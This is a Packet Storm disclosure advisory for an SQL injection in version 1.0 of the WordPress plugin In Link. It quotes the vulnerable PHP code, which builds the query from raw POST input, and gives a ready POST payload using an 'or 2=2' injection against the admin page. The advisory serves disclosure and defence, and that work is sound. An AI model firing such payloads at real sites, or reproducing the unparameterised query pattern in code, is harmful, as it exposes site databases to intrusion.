WordPress In Link 1.0 SQL Injection

2017-11-21T00:00:00
ID PACKETSTORM:145059
Type packetstorm
Reporter Dimopoulos Elias
Modified 2017-11-21T00:00:00

Description

                                        
                                            `Vulnerability Type:  
  
SQL injection is POST parameter "keyword"  
  
Affected plugin:  
---------------------------------------  
In Link  
Version: 1.0  
Requires WordPress Version: 2.8 or higher  
Compatible up to: 2.8  
URL: https://wordpress.org/plugins/inlinks/  
(plugin has been closed after the report)  
---------------------------------------  
  
Affected file inlinks/inlinks.php  
  
Affected lines:  
  
58 $Keyword = trim($_POST['keyword']);  
59 $URL = trim($_POST['url']);  
60 $Rel = trim($_POST['rel']);  
61 $Target = trim($_POST['target']);  
62 $table_name = $wpdb->prefix ."URLKeywordsMapping";  
63 $SelectKeywordURLMappingDetails = "select * from $table_name   
where FldKeyword LIKE '".$Keyword."'" ;  
64  
65 $KeywordURLMappingDetails =   
$wpdb->get_results($SelectKeywordURLMappingDetails);  
66  
67 if(count($KeywordURLMappingDetails))  
68 {  
69 $Message = "<div align='center' style=\"color:red;   
font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in   
the table.</div>";  
70 }  
  
More issues seems to exist in the plugin, because of lack of input   
validation and the lack of use of prepared statements.  
  
Affected URL:  
  
/wp-admin/options-general.php?page=inlinks%2Finlinks.php  
  
POST Parameters (with payload):  
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add  
  
Tested against:  
  
* In Link 1.0  
* WordPress 4.9  
* mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine  
wrapper  
* PHP 7.0.22-0ubuntu0.16.04.1  
  
`